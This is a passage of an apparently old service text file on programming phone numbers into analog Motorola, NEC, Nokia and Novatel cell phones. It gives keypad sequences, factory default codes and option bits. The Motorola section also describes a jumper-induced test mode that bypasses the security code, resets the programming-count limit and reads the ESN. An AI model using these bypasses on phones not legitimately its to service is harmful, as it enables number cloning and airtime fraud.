4410351C4 A AUDI 6 750 2 C 8000BC 2 B 8000BCX 1 B 8000H 2 8500 1 A 869872106 BLAUPUNKT 6 9000/ULTRA CLASSIC 6 B/C 950/950X 2 B 9800XL 6 A PERSONAL (w/ menu button) 6 PERSONAL (w/o menu) 1 SELLER CODES ~~~~~~~~~~~~ A: Motorola Direct B: US West Cellular C: McCaw (Cell One) D: LA Cellular E: Ameritech Step 2: Once the phone model and sequence number are identified, determine ~~~~~~~ the program access sequence from this list. PROGRAM ACCESS SEQUENCES Sequence Number 1 FCN + Security Code + Security Code + RCL 2 STO + # + Security Code + Security Code + RCL 3 CTL + 0 + Security Code + Security Code + RCL 4 CTL + 0 + Security Code + Security Code + (*) 5 FCN + 0 + Security Code + Security Code + MEM 6 FCN + 0 + Security Code + Security Code + RCL (*) CTL - Control button is either a button on keypad or the VOLUME button on the left side of the handset NOTE: Factory Programmed Security Code is 000000 Step 3: PROGRAMMING SEQUENCE ~~~~~~~ Power On Enter program access sequence with 10 seconds Prompt 01 is displayed Repeatedly press * to increment (contents of locations are displayed) Press SEND to write NAM information (press # prior to SEND for 2nd Number) (to enable 2nd number, bit 5 step 10 must be enabled and phone must be software equipped for 2nd number) STEP # of digits 1 System ID 5 XXXXX 2 Area Code 3 XXX 3 Mobile Number 7 XXX-XXXX 4 Station Class 2 XX 5 Access Overload 2 XX 6 Group ID 2 XX 7 Security Code 6 XXXXXX 8 Unlock Code 3 XXX 9 Initial Paging Channel 4 0333 or 0334 10 Program Opt(1) 6 XXXXXX 11 Program Opt(2) 3 XXX Program Options Step 10 Step 11 ~~~~~~~ ~~~~~~~ Disable int speaker Long tone DTMF Local Use Handset Speaker Enable (carry phone only) MIN Mark Eight Hour Timeout in Convertible Auto Recall Second phone # (must have software) Diversity TEST MODE ~~~~~~~~~ Motorola phones can be keypad programmed three times only and you also must know the security code. The manual test mode will get you around both obstacles. A mobile test adapter is needed to induce test mode. Manual test mode will work on "F" series or newer only. (F,G,H,I,J etc..) Model# F08G6789 is a "G" series ~ 1. Turn phone Power Off 2. Mobiles/Transportable models- instal a jumper between pins 17 & 21 on the data cable connector (RS232). Portable models- jumper pin #6 to Ground (Ground is the large, center contact on back of phone with battery removed) 3. Turn phone Power On 4. Press # button 5. Press 55# (to view NAM contents) 6. Repeatedly press * to step through NAM contents 7. Read and note 6 digit security code 8. Press * repeatedly until tick mark (') shows in display 9. Power OFF to exit manual test mode Resetting three times counter: 1. Use jumper to place phone in test mode and Power On 2. Press # 3. Press 32 # (wait until tick mark (') shows in display) 4. Power Off to exit test mode Reading ESN: 1. Place phone in test mode and Power On 2. Press # 3. Press 38# 4. Repeatedly press * to read entire ESN (00,01,02,03) 2 digits at a time 5. Press * until tick mark (') shows in display 6. Power phone off to exit manual test mode. System Select Motorola Phones MODEL # KEYPAD FUNCTION 1100 CONTROL + * + * + * + etc.. until following appears 1500 STD AB or STD BA" 1800 SCAN BA or SCAN AB 2000X SCAN A MC100 SCAN B MC200 Press STO to enter selection TT2 MODEL # KEYPAD FUNCTION 1900 RCL + * + * + * + etc.. until following appears 2200 STD AB or STD BA 4500XL SCAN BA or SCAN AB TT22 HOME MC300 SCAN A Carry Phone SCAN B Press # to enter selection MODEL # KEYPAD FUNCTION 750 RCL + * + * + * + etc.. until following appears 750 "L" series STD AB or STD BA 950 SCAN BA or SCAN AB 950X HOME 2600 SCAN A 3000 SCAN B 5000(ver2) 8000BCX CLASSIC MC500 TT3 TT5 ULTRA CLASSIC MODEL # KEYPAD FUNCTION PERSONAL TELEPHONE RCL + * + * + * + etc.. until following appears 4000C STD AB or STD BA 5000 SCAN BA or SCAN AB 6000 HOME 6000X SCAN A 6000XL SCAN B 8000BC Enter SYS ID 8500 Press STO to enter selection 2000 2000R NOT APPLICABLE 4000X 4500 MODEL # KEYPAD FUNCTION 6800XL MENU + 2 + 3 + STO + (* or scroll forward or backward through to following choices) STD AB or STD BA SCAN BA or SCAN AB HOME SCAN A SCAN B PREFERRED SIDs (up to 5 SIDs, press STO to enter, CLR to erase) Press STO to enter selection Press END to exit w/ no changes MODEL # KEYPAD FUNCTION PERSONAL TELEPHONE FCN + MENU + 2 + 3 + STO or RCL + * (< or > to scroll) STD AB or STD BA SCAN BA or SCAN AB HOME SCAN A SCAN B ENTER SID (5 SIDs max) Press STO to enter selection HORN ALERT - MOTOROLA PHONES MC100 1100 2000 N/A 2000R 4500 MC200 Control + 4 (Control button located on left side) MC300 1500 1800 2000 4500XL MC500 FCN + 4 1900 2200 2600 3000 6800XL 5000(ver2) TT5 4000C AUX 4000X 5000 6000X 6000XL 6000 MUTE New Unlock Code for Motorola's MC100/200/300 N/A 1100/1500/1800 1900/2000/2000R 2000X/2200/2600 4000X/4500 TT2/TT22 Carry Phone PERSONAL TELEPHONE (w/o MENU) 3000 FCN + 0 + 6 digit security code + new 3 digit unlock code + RCL 750 "L" series STO + # + 6 digit security code + new 3 digit unlock 950X code + STO 4000C 5000/6000 5000(ver2) FCN + 0 + 6 digit security code + new 3 digit unlock code + STO 4500XL CONTROL + 0 + 6 digit security code + new 3 digit unlock code + # 6000X FCN + 6 digit security code + new 3 digit unlock 8500 code + STO MC500 FCN + 0 + 6 digit security code + new 3 digit unlock TT5 code + STO 9000/Ultra Classic 6800XL MENU + 5 + 4 + STO + 6 digit security code + new PERSONAL TELEPHONE 3 digit unlock code. (w/o menu) ------------------------------------------------------------------------------- PROGRAMMER INSTRUCTIONS MOTOROLA's ------------------------------------------------------------------------------- MODELS 1100 1500 1500A 1800 2000 2000X 2000XSE 2000XT 3000 4000CMC200 5000MC400 6000XG MC500 MC100 NAM Type: EEPROM Manufacturer: Motorola Programmer: Motorola 1801-CELPROG or Handset ESN Prefix DEC: 130 HEX: 82 ESN, S/N Match Required: No Handset Programmable: Yes (small style transciever and known security code/manual test adpater) Number of Channels: 666 (smaller transcievers) else 832 Phone Number: XXX-XXX-XXXX Security Code: XXXXXX Lock Code: XXX System ID: XXXXX Preferred System: A or B Access Overload: XX Group ID: XX MIN Option: Enabled Local Use: Enabled Initial Paging Channel: 333 or 334 Diversity: Disabled (Enabled if equiped) Abbreviated Memory: Enabled End-to-End signaling: Enabled Horn Alert: Enabled Standard Parameters Air Time Counter: Enabled IMTS Combination: Disabled Service Levels: Enabled Service Level: 4 Select System Program: Enabled Auto Recall: Enabled Lock Mode: Enabled Handsfree Auto Mute: Disabled Scrambler Opt.: Disabled Test Mobile: disabled Station Class: XX (00-666 ch or 08-832 ch) Single System Scan: Disabled Ext (n-1) Field: disabled First Channel System A: 333 First Channel System B: 334 Number of Dedicated Channels: 21 Option Bits Hex Address B7 B0 1A 0 0 0 0 0 0 0 0 1B 0 0 0 0 0 0 0 0 1C 0 0 0 0 1 0 0 0 Hex Address 1B - B0 Portable Scan 0=Portable, 1=Mobile B3 Eight HR Timeout 0=Enable, 1=Disable B5 Long Tone DTMF 0=Disable, 1=Enable Hex Address 1C - B3 Disable Handset Speaker - Handsfree Applications ------------------------------------------------------------------------------- MOTOROLA TT2, TT3, TT5, TT22 ------------------------------------------------------------------------------- NAM Type: EEPROM Manufacturer: Motorola Programmer: Motorola 1801-CELPROG or Handset ESN Prefix DEC: 130 HEX: 82 ESN, S/N Match Required: No Handset Programmable: Yes (small transciever & known security code) Number of Channels: 666 or 832 Phone Number: XXX-XXX-XXXX Security Code: XXXXXX Lock Code: XXX System ID: XXXXX Preferred System: A or B Access Overload: XX Group ID: XX MIN Option: Enabled Local Use: Enabled Initial Paging Channel: 333 or 334 Diversity: Disabled (Enabled if Equipped) Abbreviated Memory: Enabled End-to-End DTMF: Enabled Horn Alert: Enabled standard parameters Air Time Counter: Enabled IMTS Combination: Disabled (Enabled if Equipped) Service Levels: Enabled Service Level: 4 Select System Program: Enabled Auto Recall: Enabled Lock Mode: Enabled Handsfree Auto Mute: Disabled Scrambler Opt: Disabled Test Mobile: disabled Station Class: XX(00-666 ch or 08-832 ch) Single System Scan: Disabled Ext(n-1) Field: Disabled First Channel System A: 333 First Channel System B: 334 Number of Dedicated Channels: 21 Option Bits: Hex Address B7 B0 1A 0 0 0 0 0 0 0 0 1B 0 0 1 0 0 0 0 1 1C 0 0 0 0 0 0 0 0 Hex Address 1B - B0 Portable Scan 0=Portable, 1=Mobile B3 Eight HR Timeout 0=Enable, 1=Disable B4 Handset Speaker 0=Disabled, 1=Enabled B5 Long Tone DTMF 0=Disabled, 1=Enabled Hex Address 1C - B3 Call Processing Speaker 1=Disable, 0=Enable ------------------------------------------------------------------------------- NEC 1000, 3500, 5000 and 7000 ------------------------------------------------------------------------------- NAM Type: PROM (Open collector) Manufacturer: NEC Programmer: Curtis or Bytek EN Prefix DEC: 135 HEX: 87 ESN, S/N Match Required: Yes Programmable Handset: No Available Channels: 666 Phone Number Format: XXX-XXX-XXXX Lock Code (1000) or Security Code: XXX System ID Format: XXXXX Horn Alert Option: 1 Handsfree Option: 0 End-to-End Signalling: 1 Repertory Option: 1 Group ID Format: XX Access Overload Class: XX Station Class: 0000 (Binary) Local Use Option: 1 MIN Option: 1 Initial Paging Channel: 333 or 334 Preferred System: 0 (B) or 1 (A) ------------------------------------------------------------------------------- NEC 3700, 4500 & 4600 ------------------------------------------------------------------------------- NAM Type: EEPROM Manufacturer: NEC Programmer: Handset with NEC adaptor ESN Prefix DEC: 135 HEX: 87 ESN, S/N Match Required: Yes Hanset Programmable: Yes with NEC adaptor Number of Channels: NEC 3700: 832 NEC 4500: 666 NEC 4600: 832 Programming Sequence: Insert Programming adaptor in series with data cable at transceiver Attach load to antenna port Power On Enter test mode: RCL + # + 01 Enter programming mode: RCL + # + 71 Press # to enter data and increment To exit programming mode hold CLR To exit test mode: RCL + # + 02 # of Digits Mobile Number: 10 XXX-XXX-XXXX Lock Code: 4 XXXX System ID: 5 XXXXX Group ID: 2 XX Initial Paging Channels: 3 333 or 334 Preferred System: 1 0 (B) or 1 ( A) Access Overload: 2 XX MIN Option: 1 1 (If phone has dual software (579D/IC505/VS.1) in socket IC505, then follow NEC 4700 Dual NAM instructions) Horn Alert: FCN + 3 New Unlock Code: NAM System Select: FCN + 5 + 5 + 5 etc.. (until following appears) Standard AB or BA H only A only B only ------------------------------------------------------------------------------- NEC 3800 & 4800 ------------------------------------------------------------------------------- NAM Type: EEPROM Manufacturer: NEC Programmer: Handset with NEC Program Adaptor (Part #41-2019 and Conversion Cable (Part #19-0157) ESN Prefix DEC: 135 HEX: 87 ESN, S/N Match Required: Yes Number of Channels: 832 Programming Sequence: Connect programming adaptor and cable to transceiver Power On with PWR button Enter test mode: RCL + # + 0 + 1 Select NAM number with the following sequence 3800 (0 or 1) 4800 (0, 1, 2 or 3) Press RCL + # + 7 + 6 + X + # X=0 NAM 1 X=1 NAM 2 X=2 NAM 3-4800 only X=3 NAM 4-4800 only Enter programming mode: RCL + # + 7 + 1 Press # to enter data and increment To exit programming mode hold CLR To exit test mode: RCL + # + 0 + 2 # of Digits Mobile of Number: 10 XXX-XXX-XXXX + # Lock Code: 4 XXXX + # System ID: 5 XXXXX + # Group ID: 2 XX + # Initial Paging Channel: 3 333 or 334 + # Preferred System: 1 0 (B) or 1(A) + # MIN Option: 1 1 + # Local Use: 1 1 + # Emergency Number: 3 911 + # Press CLR to exit programming mode Press RCL + # + 02 to exit test mode Display ESN: Insert Adaptor Enter test mode: RCL + # + 01 Press RCL + # + 24 (ESN will display) Press RCL + # + 02 (to exit test mode) Horn Alert(3800): FCN + 3 (Press 3 again to toggle) + turn ignition off Horn Alert(4800): FCN + 81 + (+ or - key to toggle) + STO + turn ignition off New Unlock Code: NAM System Select(3800): FCN + 5 + 5 + 5 + etc.. (following will appear) Standard AB or BA Home Only System A only System B only Press CLR to exit System Select(4800): FCN + 5 + 3 + (+ or - to scroll choices) + STO + CLR Choices Include: Standard AB or BA Home only A only B only ------------------------------------------------------------------------------- NEC 4700 ------------------------------------------------------------------------------- NAM Type: EEPROM Manufacturer: NEC Programmer: Handset with NEC program adaptor ESN Prefix DEC: 135 HEX: 87 ESN, S/N Match Required: Yes Handset Programmable: Yes, with NEC adaptor Number of Channels: 832 Programming Sequence: Insert Programming adaptor in series with cable at transceiver Attach load to antenna port Power On Enter test mode: RCL + # + 01 Press RCL + # + 760 + # (NAM 1) or Press RCL + # + 761 + # (NAM 2) Select NAM 1 or 2 only if dual NAM equipped Enter programming mode: RCL + # + 71 Press # to enter data and increment To exit programming mode hold CLR To exit test mode: RCL + # + 02 # of digits Mobile Number: 10 XXX-XXX-XXXX + # Lock code: 4 XXXX + # System ID: 5 XXXXX + # Group ID: 2 XX + # Initial Paging Channel: 3 333 or 334 + # Preferred System: 1 0 (B) or 1 (A) + # MIN Option: 1 1 + # Local Use: 1 1 + # (If phone has dual name software (579D/IC505/V2.1) in socket IC505, then follow dual NAM instructions) Display ESN: Insert Program adaptor Enter Test mode: RCL + # + 01 Press RCL + # + 24 (ESN will display) Press RCL + # + 02 (To exit Test mode) Horn alert: FCN + 3 + Turn Ignition Off New Unlock Code: NAM (Optional temporary lock is also available) System Select: FCN + 5 + 5 + 5 + etc.. (following will appear) Standard AB or BA Home Only System A only System B only Press CLR to exit ------------------------------------------------------------------------------- NEC 9000 & 9100 Portable ------------------------------------------------------------------------------- NAM Type: EEPROM Manufacturer: Handset ESN Prefix DEC: 135 HEX: 87 ESN, S/N Match Required: Yes, provided programming adaptor and charger are available) Number of Channels: 832 Programming Sequence: Remove portable battery Replace with fully charged NEC programming adaptor Power On Place protable in charger (9100 only) Select on of multiple NAMs with the sequence: FCN + STO + 3 + 3 (to toggle) Enter test mode: RCL + # + 01 If error appears, press RCL + # + 02 to clear Enter programming mode: RCL + # + 71 Phone number will display Press # to enter data and increment To exit programming mode hold CLR To exit test mode: RCL + # + 02 # of Digits Mobile Number: 10 XXX-XXX-XXXX Lock Code: 4 XXXX System ID: 5 XXXXX Preferred System: 1 0 (B) or 1 (A) Access Overload: 2 XX Initial Paging Channel: 3 XXX MIN Option: 1 1 New Unlock code: NAM (An optional tempory lock is also available on this mode) System Select: FCN + 5 + 5 + 5 + etc.. (Until one of the following appears) Standard AB or BA Home Only Sys A only Sys B only Press CLR to exit. ------------------------------------------------------------------------------- NEC P200 & P300 Portable ------------------------------------------------------------------------------- NAM Type: EEPROM Manufacturer: NEC Programmer: Keypad with adaptor (Part #41-2019) ESN Prefix DEC: 135 HEX: 87 ESN, S/N Match Required: Yes Number of Channels: 832 Programming Sequence: Insert Program adaptor into bottom of protable (before serial number power on 135-839601) Select NAM Number: RCL + # + 76 + NAM Number (0-3) + # Programming NAMs in sequential order only Enter Program Mode: RCL + # + 71 Enter information for each step, then press # to store parameters Press and hold CLR to program data and exit program mode Press RCL + # + 02 (to exit Test mode) # of digits Mobile Number: 10 XXX-XXX-XXXX + # Lock Code: 4 XXXX + # System ID: 5 XXXXX + # Group ID: 2 XX + # Initial Paging Channel: 4 0333 or 0334 + # System Select: 1 1(A) or 0(B) + # Access Overload: 2 XX + # MIN Option: 1 1 (Enable) + # Local Use: 1 1 (Enable) + # Emergency Number: 3 XXX + # Press CLR to exit Press RCL + # + 02 (to exit test mode) Remove Program Adaptor New Unlock Code: NAM System Select(P200): FCN + 5 + 5 + 5 + ect.. (following will appear) Standard AB or BA Home Only Sys A Only Sys B Only System Select(P300): FCN + 53 + #(or Vol Up/Down to scroll options) Options Include: AB or BA Home A Only B Only Press STO to enter selection, CLR to Exit. ------------------------------------------------------------------------------- NEC P400 & P600 Portables ------------------------------------------------------------------------------- NAM Type: EEPROM Manufacturer: NEC Programmer: Keypad with adaptor (Part #NECAM 150-0268) and conversion cable (Part #NECAM 204-0324) ESN Prefix DEC: 135 HEX: 87 ESN, S/N Match Required: Yes Stamped Model Number: P400 or P600 Number of Channels: 832 Program Sequence: Connect program adaptor to conversion cable Plug conversion cable into portable Power On and way for phone initialize. Enter # + 71 to enter test mode Select NAM Number: RCL + # + 71 + # (For NAM #1) or RCL + # + 71 + NAM Number (2-4) + # (P400 has 2 NAMs and P600 has 4 NAMs) Program NAMs in sequential order only Enter information for each step, then press # to store parameter. Press and Hold CLR to program data and exit program mode. Press RCL + # + 02 to return to standby. # of Digits Mobile Number: 10 XXX-XXX-XXXX + # Lock Code: 4 XXXX + # System ID: 5 XXXXX + # Group ID: 2 XX + # Initial Paging Channel: 4 0333 or 0334 + # System Select: 1 1(A) or 0(B) + # Access Overload: 2 XX + # MIN Option: 1 1 (Enable) + # Local Use: 1 1 (Enable) + # Emergency Number: 3 XXX + # FCN Stat: 1 0 + # Press CLR to exit Press RCL + # + 02 (to exit test mode) Remove program adaptor New Unlock Code: NAM Program Permanent Memory: Connect Adaptor and covnersion cable to portable telephone. Memory locatoins 70 through 99 can be programmed with non-erasable numbers. With cable and adaptor in place, Power phone "On". Enter telephone number + STO + memory location(70-99) System Select: FCN + 54 + RCL + RCL + RCL (to scroll choices) Option Include: AB or BA, Home, A Only, B Only Press CLR to exit. ------------------------------------------------------------------------------- NOKIA 101 & 1000 Portables ------------------------------------------------------------------------------- NAM Type: EEPROM Manufacturer: NOKIA Programmer: Keypad (Provided current security code is known-if not, service adaptor is necessary to access program parameters) ESN Prefix DEC: 165 HEX: A5 ESN, S/N Match Required: Yes Stamped Model Number: 101: THA - 6 1000: THA - 62 Number of Channels: 832 Programming Sequence: Power On Enter Program Mode: * + 3001 + # + XXXXX + STO + 0 XXXXX = 12345 (new phones) XXXXX = current security code "Store Not Done" will display If "Not Allowed" displays, verify that the correct code has been entered. This phone programs in 5 steps with multiple parameters into each step. The # and * keys are used to separate NAM parameters within the step To verify paramteres, Press RCL + Step Number(01-05) Once programming is complete, power phone Off then On to exit program mode. Step # of digits 01 Emergency Number, #, Emergency 911#*911#0*1234 + STO Number, #, Language (0=English, + 01 + STO + CLR + 1=French, 2=Spanish). * and Unlock Code 02 Mobile Number 1 (10 digits) XXX-XXX-XXXX + STO + -2 + CLR 03 SID, *, MIN Option, *, Local Use, XX*1*1*XXX*XX*XX + STO + 03 *, Initial Page Channel, *, + STO + CLR Access Overload, *, Group ID (NAM1) 04 Mobile Number 2 (Ten digits) XXX-XXX-XXXX + STO + 04 + STO + CLR 05 SID, *, MIN Option, *, Local Use, XX*1*1*XXX*XX*XX + STO + 03 *, Initial Page Channel, *, + STO + CLR Access Overload, *, Group ID (NAM1) Power Phone Off and On to complete programming New Unlock Code: NAM System Select: SEL + 1 + 1 + 1 etc (to scroll choices) Home, A, B, Both AB and BA ------------------------------------------------------------------------------- NOKIA-MOBIRA LX-11 & M-11 ------------------------------------------------------------------------------- NAM Type: EEPROM Manufacturer: NOKIA-MOBIRA Programmer: Handset or LX-11 Service Handset ESN Prefix DEC: 165 HEX: A5 ESN, S/N Match Required: Yes, either a match or subtract 737856 from serial number. Handset programmable: Yes, security code must be known Number of Channels: 832 Programming Sequence: Power On Enter Programming Mode: * + 3001 + # + XXXXX + SEL + 9 + END XXXXX=12345 (from factory) or XXXXX=Current Security Code "IdEnt IF InFO Pri" will display Press END key to step through parameters To toggle parameters, press SND Once Last parameter is entered and END key is pressed, the information is stored in the NAM Programming Sequence for 2nd NAM: Enter Programming Mode described above "IdEnt ID InFO Pri" will display Press SND to toggle to second NAM "IdEnt ID InFO OPT" will display Press END, "OPt InFO EnABLEd" appears Press END key to step through parameters and program as outlined above. # of digits System ID: 5 XXXXX Access Method (MIN Opt): 1 1 Local Use: 1 1 Phone Number: 10 XXX-XXX-XXXX Station Class: 2 08 Initial Page Channel: 3 333 or 334 Access Overload: 2 XX Preferred System: 1 A or B (SND to toggle) Group ID: 2 XX Security Code: 4 XXXX Manufacturer Date: Can't be changed Installation Date: 6 mm/dd/yy "Prog Done" will appear Horn Alert (Option): SEL + 2 + Turn ignition Off New Unlock Code: SEL + 5 + (5 digit security code) + SEL (Unlock Code Displays) + New 4 digit Unlock Code + SEL Select System: SEL + 1 + 1 + 1 (To Scroll Choices) Both Standard AB or BA H Home (A only or B only) Non H Non-Home (A only or B only) H Sid Home Only ------------------------------------------------------------------------------- NOKIA MOBIRA M-10 ------------------------------------------------------------------------------- NAM Type: EEPROM Manufacturer: NOKIA MOBIRA Pogrammer: Phone Handset or Service Handset ESN Prefix DEC: 165 HEX: A5 ESN, S/N Match Required: Yes, either a match or subtract 737856 from serial number for ESN. Handset Programmable: Yes, previded lock code is known Number of Channels: 832 Programming Sequence: Power On Enter Programming mode: * 17 * 3001 * XXXX * XXXX=1234 (new phones) else XXXX=current unlock code Once last item is entered then phone is returned to normal operations SEL button increments steps. # of Digits System ID: 5 XXXXX MIN Option: 1 1 Local Use: 1 1 Phone Number: 10 XXX-XXX-XXXX Station Class: 2 08 Initial Paging Channel: 3 333 or 334 Access Overload: 2 XX Group ID: 2 XX Unlock Code: 4 XXXX Horn Alert: SEL + 2 New Unlock Code: NAM System Select: SEL + 1 + 1 + 1 etc... (following will appear) A A only B B only S AB or BA H Home Press CLR to exit ------------------------------------------------------------------------------- NOKIA-MOBIRA P-30 Portable ------------------------------------------------------------------------------- NAM Type: EEPROM Manufacturer: NOKIA-MOBIRA Programmer: Keypad or Service adaptor ESN Prefix DEC: 165 HEX: A5 ESN, S/N Match Required: Yes Handset Programmable: Yes, provided security code is known. Number of Channels: 832 Programming Sequence: Power on Enter Access Code * + 17 + * + 2001 + * + XXXXX + * XXXXX=12345 from factory else XXXXX=current security code HO-Id should appear in display Press SEL to enter data and increment Phone automatically writes NAM information upon completion of final step # of digits System ID: 5 XXXXX MIN Option: 1 1 Local Use: 1 1 Mobile Number: 10 XXX-XXX-XXXX Station Class: 2 10 Initial Page Channel: 3 333 or 334 Access Overload: 2 XX Group ID: 2 XX Security Code: 5 XXXXX New Unlock Code: SEL + 75 + 5 digit security code (NAM) + CLR new 4 digit unlock code Sytstem Select: SEL + 1 + 1 + 1 + etc.. (following will appear) S Standard AB or BA A A only B B Only H Home Display will clear in two seconds. ------------------------------------------------------------------------------- NOKIA MOBIRA P4000 & PT-612 Portable ------------------------------------------------------------------------------- NAM Type: EEPROM Manufacturer: NOKIA MOBIRA Programmer: Keypad (provided current security code is known. If not, service adaptor is necessary to access program parameters) ESN Prefix DEC: 165 HEX: A5 Number of Channels: 832 Programming Sequence: Power On Enter Program Mode: * + 3001 + # + XXXXX + SEL + 9 + END XXXXX=12345 (new phones) else XXXXX=current security code "IDENTIF INFO PRI" will display (Press SND to toggle "on' if necessary) Press END to step through parameters To toggle parameters, press SND Once programming is complete, power phone Off then ON to exit program mode # of digits System ID: 5 XXXXX + END Access Method (MIN Opt): 1 1 + END Local Use: 1 1 + END Mobile Number: 10 XXX-XXX-XXXX + END Station Class: 2 10 + END Initial Paging Channel: 3 333 or 334 + END Preferred System: 1 (A or B) + END (SND to toggle) Group ID: 2 XX + END Security Code: 5 XXXXX+ END Serial Number: Press END Manufacturer Date: Press END Installation Date: 6 mm/dd/yy + END Programming Second NAM: With "IDENTIF INFO PRI" on display, press SND to toggle to "IDENTIF IBFO OPT" Enter information for steps 1-13 for the 2nd NAM Power Phone OFF and ON to complete the program process New Unlock Code: SEL + 5 + 5 digit security code (NAM) (Current Unlock Code will display) + new 4 digit Unlock Code + SEL System Select: SEL + 1 + 1 + 1 + etc.. (to scroll choices) Home, A, B, Both AB or BA ------------------------------------------------------------------------------- NOVATEL VTR-8300/9300 ------------------------------------------------------------------------------- NAM Type: EEPROM Manufacturer: NOVATEL Programmer: Handset ESN Prefix DEC: 142 HEX: 8E ESN, S/N Match Required: No Handset Programmable: Yes Number of Channels: 666 or 832 Programming Sequence: Power On Lock Phone: FCN + 1 Enter Programming Mode: # + 259 ESN will display Press Vol UP Button to increment or Vol DN to decrement Enter data for each step then press SND after each step Press END to write NAM information # of Digits Mobile Number: 10 XXX-XXX-XXXX System ID: 5 XXXXX Initial Paging Channel: 3 333 or 334 Access Overload: 2 XX Group ID: 2 XX Initial Paging Channel: 3 333 (A) Initial Paging Channel: 3 334 (B) Data Scanning Table: 1 1 Lock Code(1): 4 XXXX (see owner's manual) Lock Code(2): 4 XXXX (see owner's manual) Invalid ID (System ID should not roam on): 5 XXXXX Local Use -SND to toggle: SET EX (MIN Opt) - SND to toggle: SET Preferred System - SND to toggle: SET (A) or CLR (B) NonPreferred System Roam: CLR End-to-End Signalling: SET Fast Dial & Manual Fast Dial: Press SND to toggle Set DTMF length: Press SND to toggle ------------------------------------------------------------------------------- NOVATEL 8305 (EXCLUDING CA08 SOFTWARE) ------------------------------------------------------------------------------- NAM Type: EEPROM Manufacturer: NOVATEL Programmer: Handset ESN Prefix DEC: 142 HEX: 8E ESN, S/N Match Required: No Number of Channels: 832 Programming Sequence: Power Lock Phone: FCN + 1 Enter Programming Mode: # + 259 Press Vol Up to view Software version and ESN in Hex Press Vol Up to increment and Vol Dn to decrement Enter data for each step then press SND after each step Press END to write NAM information # of digits Mobile Number: 10 XXX-XXX-XXXX Initialize Memory Locations: SND (then wait) System ID: 5 XXXXX Initial Page Channel: 3 333 or 334 Access Overload: 2 XX Group ID: 2 XX Initial Page Channel: Preset Vol Up (A) Initial Page Channel: Preset Vol UP (B) Data Scanning table: Preset Full Lock Code: Preset/Handset Restricted Lock Code: Preset/Handset Invalid ID 1: 5 XXXXX Invalid ID 2: 5 XXXXX Invalid ID 3: 5 XXXXX Invalid ID 4: 5 XXXXX (*) If phone has CA06 software or lower, phone can be programmed 3 times only. To program phone a 4th time, there are 2 options: #1 - Upgrade software to CA07 or newer #2 - Reset MIN counter, with service compact control unit (available from NOVATEL) Local Use - SND to toggle: SET EX (Min Opt) - SND to toggle: SET Preferred System-SND to toggle: SET (A) or CLR (B) Roam Inhibit - SND to toggle: CLR Quick Recall - SND to toggle: SET Quick Store - SND to toggle: SET Wake Up Tone - SND to toggle: SET End-to-End Sig - SND to toggle: SET Fast Dial - SND to toggle: SET Manual Fast Dial-SND to toggle: SET 32 digit dialing-SND to toggle: SET Call Timer 30 seconds hold on mobile line originated calls when SET - SND to toggle: CLR Call Timer 30 second hold on land line orginated calls when SET - SND to toggle: CLR Call Timer round up next minute when SET - SND to toggle: SET No Land-to-Mobile Option: CLR (for europe only) Horn Alert - SND to toggle: SET On-Line Diagnostics - SND to toggle: SET ------------------------------------------------------------------------------- NOVATEL 8305 (CA08 SOFTWARE) ------------------------------------------------------------------------------- NAM Type: EEPROM Manufacturer: NOVATEL Programmer: Handset ESN Prefix DEC: 142 HEX: 8E ESN, S/N Match Required: Yes Number of Channels: 832 Programming Sequence: Power On Lock Phone: FCN + 1 Enter Programmig Mode: # + 259 Press Vol Up to view Software version and ESN in Hex Press Vol Up to increment and Vol Dn to decrement Enter data for each step then press SND after each step Press END to write NAM information Initialize Memory Locations: SND (then wait) System ID: 5 XXXXX Mobile Number: 10 XXX-XXX-XXXX Full Lock Code: Preset/Handset Restricted Lock Code: Preset/Handset EX (MIN Opt) - SND to toggle: SET Initial Page Channel: 3 333 or 334 Access Overload: 2 XX Group ID: 2 XX Initial Page Channel: Preset Vol Up(A) Initial Page Channel: Preset Vol Up(B) Data Scanning Table: Preset 1 Invalid ID 1: 5 XXXXX Invalid ID 2: 5 XXXXX Invalid ID 3: 5 XXXXX Invalid ID 4: 5 XXXXX Local Use - SND to toggle: SET Preferred system - SND to toggle: SET (A) or CLR (B) Roam Inhibit - SND to toggle: CLR Manufacturer Option: CLR Quick Recall-SND to toggle: SET Quick Store -SND to toggle: SET Wake Up Tone-SND to toggle: SET End-to-End Sig-SND to toggle: SET Fast Dial - SND to toggle: SET Manual Fast Dial - SND to toggle: SET 32 Digit Dialing - SND to toggle: SET Call Timer 30 second hold on mobile originated calls when SET - SND to toggle: SET Call Timer round up to next minute when SET - SND to toggle: SET No Land-to-Mobile Option: CLR Horn Alert - SND to toggle: SET On-Line diagnostics - SND to toggle: SET ------------------------------------------------------------------------------- NOVATEL 8320 (Includes Hp-3000 Series) ------------------------------------------------------------------------------- NAM Type: EEPROM Manufacturer: NOVATEL Programmer: Handset ESN Prefix DEC: 142 HEX: 8E ESN, S/N Match Required: Yes Number of Channels: 832 Programming Sequence: Phone On Lock Phone: FCN + 1 + SND Enter Program Mode: # + 259 Software Version will display Press Vol Up to view ESN Press Vol Up to and select NAM (0-4) 0=Parameters common to all NAMs 1=NAM 1, 2=NAM 2, 3=NAM 3, 4=NAM 4 (Recommend - Press NAM 0 First) If a number is entered for a parameter, press SND to enter information If a parameter is toggled, press SND to toggle Once the parameter is entered, press Vol Up to view the next step To perform programming, press END (END will also allow access to tamperproof protection and NAM select) NAM 0 (If "View NAM Only" appears, the tamperproff portection has been enabled and the phone's 6 digit security code must be entered continue) # of Digits Initialize memory Locations: Press SND-Wait + Vol UP Full Lock Code: Preset/Handset + Vol UP Restricted Lock Code: Preset/Handset + Vol UP 9 Number Quick Recall: Set (SND to toggle) + Vol UP 9 Number Quick Store: Set (SND to toggle) + Vol UP Initialization Tone: Set (SND to toggle) + Vol UP Call Timer 30 seconds hold on mobile orignated calls when SET - Press SND to toggle: CLR + Vol UP Call Timer 30 seconds hold on land line originated calls when SET - Press SND to toggle: CLR + Vol UP Call timer round up to next minute when SET - Press SND to toggle: SET + Vol UP End-to-End Signalling- Press SND to toggle: SET + Vol UP No Land to Mobile Option-disables call timer for incoming calls: CLR + Vol UP Horn Alert - Press SND to toggle: SET + Vol UP On-Line Diagnostics-Press SND to toggle: SET + Vol UP Press END to return to NAM select, Additional Program Parameters or Tamperproof Proteciton ------------------------------------------------------------------------------- NOVATEL AURORA 100 & 200 SERIES ------------------------------------------------------------------------------- NAM Type: Tri-State Manufacturer: Novatel Programmer: Curtis or Bytek ESN Prefix DEC: 142 HEX: 8E ESN, S/N Match Required: No Programmable Handset: No Available Channels: 666 Phone Number Format: XXX-XXX-XXXX Lock Code Format: XXX System ID Format: XXXX 